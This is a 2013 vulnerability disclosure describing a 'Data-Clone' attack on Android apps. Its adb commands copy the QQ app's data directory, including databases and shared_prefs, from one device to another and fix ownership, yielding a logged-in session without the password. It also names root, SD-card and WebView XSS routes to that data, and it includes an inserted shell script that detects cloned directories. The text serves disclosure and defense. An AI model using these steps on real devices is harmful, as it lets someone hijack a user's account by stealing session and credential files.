"Data-Clone" -- a new way to attack android apps
Author: SuperHei () www knownsec com [Email:5up3rh3i#gmail.com]
Release Date: 2013/03/16
References: http://www.80vul.com/android/data-clone.txt
Chinese Version:
http://blog.knownsec.com/2013/03/attack-your-android-apps-by-webview/
--[ I - Introduction
This is a new way to attack Android apps, and I call it the "Data-Clone
Attack". It can bypass password authentication when the user has logged in to the
app and set "remember password" (an option some apps define).
--[ II - Description
Let us use a demo to illustrate it. This is the test procedure:
1. Open two emulators.
adb devices
List of devices attached
emulator-5554 device
emulator-5556 device
Install "com.tencent.mobileqq"
(https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps) on both
devices. Of course, you can also use other applications to test.
2. Log in to the app on "emulator-5554" and make sure you choose
"remember password".
Then pull the app data to your PC:
adb -s emulator-5554 pull /data/data/com.tencent.mobileqq/ d:\\aab
pull: building file list...
pull: /data/data/com.tencent.mobileqq/databases/qcenter.Db ->
d:\\aab/databases/qcenter.Db
pull: /data/data/com.tencent.mobileqq/databases/*************.db ->
d:\\aab/databases/*************.db
pull: /data/data/com.tencent.mobileqq/shared_prefs/only.xml ->
d:\\aab/shared_prefs/only.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/share.xml ->
d:\\aab/shared_prefs/share.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml
-> d:\\aab/shared_prefs/com.tencent.mobileqq_preferences.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml ->
d:\\aab/shared_prefs/mobileQQ.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/*************.xml
-> d:\\aab/shared_prefs/*************.xml
pull: /data/data/com.tencent.mobileqq/files/ADPic/457 -> d:\\aab/files/ADPic/457
pull: /data/data/com.tencent.mobileqq/files/Skin/skinmain.xml ->
d:\\aab/files/Skin/skinmain.xml
pull: /data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png ->
d:\\aab/files/Skin/tab_bg_bar.png
pull: /data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml ->
d:\\aab/files/Skin/thumbnail_skin.xml
pull: /data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png ->
d:\\aab/files/Skin/title_bg_bar.png
pull: /data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat ->
d:\\aab/files/sc/ConfigStore2.dat
pull: /data/data/com.tencent.mobileqq/files/ConfigStore2.dat ->
d:\\aab/files/ConfigStore2.dat
pull: /data/data/com.tencent.mobileqq/files/runningApp ->
d:\\aab/files/runningApp
pull: /data/data/com.tencent.mobileqq/lib/libamrnb.so -> d:\\aab/lib/libamrnb.so
pull: /data/data/com.tencent.mobileqq/lib/libaudiohelper.so ->
d:\\aab/lib/libaudiohelper.so
pull: /data/data/com.tencent.mobileqq/lib/libcodecwrapper.so ->
d:\\aab/lib/libcodecwrapper.so
pull: /data/data/com.tencent.mobileqq/lib/libCommon.so ->
d:\\aab/lib/libCommon.so
pull: /data/data/com.tencent.mobileqq/lib/liblbs.so -> d:\\aab/lib/liblbs.so
pull: /data/data/com.tencent.mobileqq/lib/libmsfboot.so ->
d:\\aab/lib/libmsfboot.so
pull: /data/data/com.tencent.mobileqq/lib/libsnapcore.so ->
d:\\aab/lib/libsnapcore.so
pull: /data/data/com.tencent.mobileqq/lib/libVideoCtrl.so ->
d:\\aab/lib/libVideoCtrl.so
23 files pulled. 0 files skipped.
88 KB/s (4431172 bytes in 49.011s)
3. Push the data to "emulator-5556":
adb -s emulator-5556 push D:\\aab /data/data/com.tencent.mobileqq/
push: D:\\aab/databases/qcenter.Db ->
/data/data/com.tencent.mobileqq/databases/qcenter.Db
push: D:\\aab/databases/*************.db ->
/data/data/com.tencent.mobileqq/databases/*************.db
push: D:\\aab/files/ADPic/457 -> /data/data/com.tencent.mobileqq/files/ADPic/457
push: D:\\aab/files/sc/ConfigStore2.dat ->
/data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat
push: D:\\aab/files/Skin/title_bg_bar.png ->
/data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png
push: D:\\aab/files/Skin/thumbnail_skin.xml ->
/data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml
push: D:\\aab/files/Skin/tab_bg_bar.png ->
/data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png
push: D:\\aab/files/Skin/skinmain.xml ->
/data/data/com.tencent.mobileqq/files/Skin/skinmain.xml
push: D:\\aab/files/runningApp ->
/data/data/com.tencent.mobileqq/files/runningApp
push: D:\\aab/files/ConfigStore2.dat ->
/data/data/com.tencent.mobileqq/files/ConfigStore2.dat
push: D:\\aab/lib/libVideoCtrl.so ->
/data/data/com.tencent.mobileqq/lib/libVideoCtrl.so
push: D:\\aab/lib/libsnapcore.so ->
/data/data/com.tencent.mobileqq/lib/libsnapcore.so
push: D:\\aab/lib/libmsfboot.so ->
/data/data/com.tencent.mobileqq/lib/libmsfboot.so
push: D:\\aab/lib/liblbs.so -> /data/data/com.tencent.mobileqq/lib/liblbs.so
push: D:\\aab/lib/libCommon.so ->
/data/data/com.tencent.mobileqq/lib/libCommon.so
push: D:\\aab/lib/libcodecwrapper.so ->
/data/data/com.tencent.mobileqq/lib/libcodecwrapper.so
push: D:\\aab/lib/libaudiohelper.so ->
/data/data/com.tencent.mobileqq/lib/libaudiohelper.so
push: D:\\aab/lib/libamrnb.so -> /data/data/com.tencent.mobileqq/lib/libamrnb.so
push: D:\\aab/shared_prefs/share.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/share.xml
push: D:\\aab/shared_prefs/only.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/only.xml
push: D:\\aab/shared_prefs/mobileQQ.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml
push: D:\\aab/shared_prefs/com.tencent.mobileqq_preferences.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml
push: D:\\aab/shared_prefs/*************.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/*************.xml
23 files pushed. 0 files skipped.
69 KB/s (4431172 bytes in 62.108s)
4. Open an adb shell on "emulator-5556":
adb -s emulator-5556 shell
# ls -l /data/data/
ls -l /data/data/
drwxr-x--x app_1 app_1 2012-09-24 02:43 com.android.htmlviewer
....
drwxr-x--x app_35 app_35 2012-12-06 07:17 com.tencent.mobileqq
This shows that the owner of com.tencent.mobileqq is "app_35".
Because the data was pushed as root, the pushed directories are owned by root:
# ls -l /data/data/com.tencent.mobileqq
ls -l /data/data/com.tencent.mobileqq
drwxrwxr-x root root 2012-12-06 07:17 shared_prefs
drwxrwxr-x root root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x system system 2012-12-06 07:17 lib
So we need to chown them:
# cd /data/data/com.tencent.mobileqq
cd /data/data/com.tencent.mobileqq
# chown app_35 *
chown app_35 *
# ls -l
ls -l
drwxrwxr-x app_35 root 2012-12-06 07:17 shared_prefs
drwxrwxr-x app_35 root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x app_35 system 2012-12-06 07:17 lib
5. Open the app on "emulator-5556", and you are logged in to
com.tencent.mobileqq on "emulator-5556".
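The ownership listing in step 4 is also a forensic trace of the clone: after `chown app_35 *` the group of the pushed directories is still root and lib no longer belongs to system. The following check is an added example, not part of the original advisory; the function name `audit_app_dir` is hypothetical, it assumes the `ls -l` column layout shown above, and it assumes lib is normally system:system as in the pre-chown listing.

```shell
#!/bin/sh
# Listing copied from step 4 of the write-up (state after `chown app_35 *`).
CLONED_LISTING='drwxrwxr-x app_35 root 2012-12-06 07:17 shared_prefs
drwxrwxr-x app_35 root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x app_35 system 2012-12-06 07:17 lib'

# Constructed sample: the same directory as the app itself would create it
# (assumed layout, modelled on the cache/ and files/ entries above).
CLEAN_LISTING='drwxrwx--x app_35 app_35 2012-12-06 07:17 shared_prefs
drwxrwx--x app_35 app_35 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x system system 2012-12-06 07:17 lib'

# audit_app_dir APP_UID
# Reads an `ls -l` listing of /data/data/<pkg> on stdin and prints one line
# per entry whose ownership or mode does not match what the app would create.
audit_app_dir() {
    awk -v uid="$1" '
        NF >= 6 {
            mode = $1; owner = $2; group = $3; name = $NF
            # Assumption taken from the page: lib/ belongs to system:system.
            want = (name == "lib") ? "system" : uid
            why = ""
            if (owner != want || group != want)
                why = "owner " owner ":" group " (expected " want ":" want ")"
            # "other" read bit set on a private data directory
            if (name != "lib" && substr(mode, 8, 1) == "r")
                why = why (why == "" ? "" : "; ") "world-readable"
            if (why != "") print name ": " why
        }'
}

echo "== cloned directory =="
printf '%s\n' "$CLONED_LISTING" | audit_app_dir app_35
echo "== clean directory =="
printf '%s\n' "$CLEAN_LISTING" | audit_app_dir app_35
```

On the cloned listing this flags shared_prefs, databases and lib; on the clean listing it prints nothing.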
--[ III - How to exploit
"How to get the contents of data" is key to the completion of the
attack. Some ways to do it:
1. Already have super privileges
Under a root shell, as in the demo, you can bypass password
authentication using the "Data-Clone Attack".
2. Apps installed on the SD card
Others have read permission there and can obtain the app's data.
3. Cross-site scripting on Android
app + webview + xss (or webkit xcs vul) = "Data-Clone"
On older versions of Android, an Android app's XSS or a WebKit xcs vul can
read the contents of local files:
http://www.80vul.com/android/android-0days.txt
So the app's WebView has file read permission on the app's data.
When an app user visits a URL link, the data will be cloned.
--[ IV - Disclosure Timeline
2012/03/ - Found this
2012/12/10 - Report it to security () android com
from vendor
...... A long time has passed ......
2013/03/16 - security () android com has not given any response
(maybe because Google was not Android's biological mother)
2013/03/16 - Public Disclosure